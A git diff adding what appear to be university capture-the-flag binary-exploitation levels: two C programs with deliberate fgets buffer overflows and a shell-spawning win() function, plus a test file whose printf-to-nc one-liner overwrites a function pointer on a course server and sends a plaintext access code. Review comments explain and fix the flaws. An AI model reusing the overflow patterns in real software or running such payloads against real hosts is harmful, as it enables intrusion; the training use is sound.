diff --git a/4/level1/core b/4/level1/core
new file mode 100644
index 0000000..0b475d3
Binary files /dev/null and b/4/level1/core differ
diff --git a/4/level1/flag.txt b/4/level1/flag.txt
new file mode 100644
index 0000000..edd5b55
--- /dev/null
+++ b/4/level1/flag.txt
@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}
diff --git a/4/level1/level1 b/4/level1/level1
new file mode 100755
index 0000000..ffd44de
Binary files /dev/null and b/4/level1/level1 differ
diff --git a/4/level1/level1.c b/4/level1/level1.c
new file mode 100644
index 0000000..3a03dd0
--- /dev/null
+++ b/4/level1/level1.c
@@ -0,0 +1,58 @@
+// gcc -o level1 -no-pie -fno-stack-protector level1.c
+#include
+#include
+#include
+#include
+#include
+
+struct topic {
+ char question[64];
+ char answer[32];
+ int (*check_response)(struct topic *topic);
+};
+
+void win() {
+ char *argv[2];
+ argv[0] = "/bin/sh";
+ argv[1] = NULL;
+ execve(argv[0], argv, NULL);
+}
+
+int check_math_response(struct topic *topic) {
+ int answer = atoi(topic->answer);
+ if (answer == 0x7a69) {
+ puts("You got it.");
+ return 0;
+ } else {
+ puts("Try again.");
+ return 1;
+ }
+}
+
+int check_weather_response(struct topic *topic) {
+ if (!strcmp(topic->answer, "Yes\n")) {
+ puts("It's inevitable.");
+ return 0;
+ } else {
+ puts("Are you sure about that?");
+ return 1;
+ }
+}
+
+int main(int argc, char **argv) {
+ // Disable output buffering. Not part of the challenge.
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+
+ struct topic topics[] = {
+ {"What is 3077 * 10 + 567?", "", check_math_response},
+ {"Will it ever rain this year?", "", check_weather_response}};
+
+ srand(time(NULL));
+ struct topic *topic = &topics[rand() % 2];
+
+ puts(topic->question);
+ fgets(topic->answer, sizeof(*topic), stdin);
+ printf("addr: %X\n", topic->check_response);
+ return topic->check_response(topic);
+}
diff --git a/4/level1/test b/4/level1/test
new file mode 100644
index 0000000..2abce17
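Review bot: In level1.c's `main`, `fgets(topic->answer, sizeof(*topic), stdin)` bounds the read by the size of the whole `struct topic` rather than the 32-byte `answer` field, so input longer than the field is written over the adjacent `check_response` pointer that `main` calls on its last line. The bound should come from the destination field, `fgets(topic->answer, sizeof(topic->answer), stdin);`. The `printf("addr: %X\n", topic->check_response)` line also passes a function pointer to `%X`, which is a mismatched specifier and prints part of a code address; drop it or keep it behind a debug switch. The build comment's `-no-pie -fno-stack-protector` suggests this is a deliberate training target, in which case a comment saying so directly above the `fgets` would keep the pattern from being copied into real code.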
--- /dev/null
+++ b/4/level1/test
@@ -0,0 +1,5 @@
+unit activation code
+32x spacer for array
+then jump address (reverse order)
+
+printf 'p90xiy6HFLfLKSyxptNlpYr1IHGlZvMS\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x36\x12\x40\00\00\00\00\00\ncat flag.txt\n' | nc binexp.stud12.hacklab.ias.tu-bs.de 4001
diff --git a/4/level2/flag.txt b/4/level2/flag.txt
new file mode 100644
index 0000000..edd5b55
--- /dev/null
+++ b/4/level2/flag.txt
@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}
diff --git a/4/level2/level2 b/4/level2/level2
new file mode 100755
index 0000000..e2258e0
Binary files /dev/null and b/4/level2/level2 differ
diff --git a/4/level2/level2.c b/4/level2/level2.c
new file mode 100644
index 0000000..9675792
--- /dev/null
+++ b/4/level2/level2.c
@@ -0,0 +1,22 @@
+// gcc -o level2 -no-pie -fno-stack-protector level2.c
+#include
+#include
+
+void win() {
+ char *argv[2];
+ argv[0] = "/bin/sh";
+ argv[1] = NULL;
+ execve(argv[0], argv, NULL);
+}
+
+int main(int argc, char **argv) {
+ // Disable output buffering. Not part of the challenge.
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+
+ char buffer[32];
+ puts("What do you want to talk about?");
+ fgets(buffer, 320, stdin);
+ puts("Bye.");
+ return 0;
+}
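Review bot: The `printf` line in 4/level1/test commits what the notes above it call a unit activation code in plaintext, next to the host it is sent to. If that code is a per-user or per-team credential, which it appears to be, it should stay out of version control: read it from an environment variable or an untracked file instead. If this repository is shared, treat the committed value as exposed and have it reissued.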
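Review bot: In level2.c's `main`, `fgets(buffer, 320, stdin)` accepts up to 319 bytes into the 32-byte `buffer`, so any longer line is written past the array onto the rest of the stack frame, and the `-fno-stack-protector` flag in the build comment means nothing detects it. The size argument should come from the destination, `fgets(buffer, sizeof buffer, stdin);`, and the return value should be checked before `buffer` is relied on. If the oversized read is the intended exercise, a one-line comment such as `/* intentionally oversized read: training target, do not reuse */` above the call would document that.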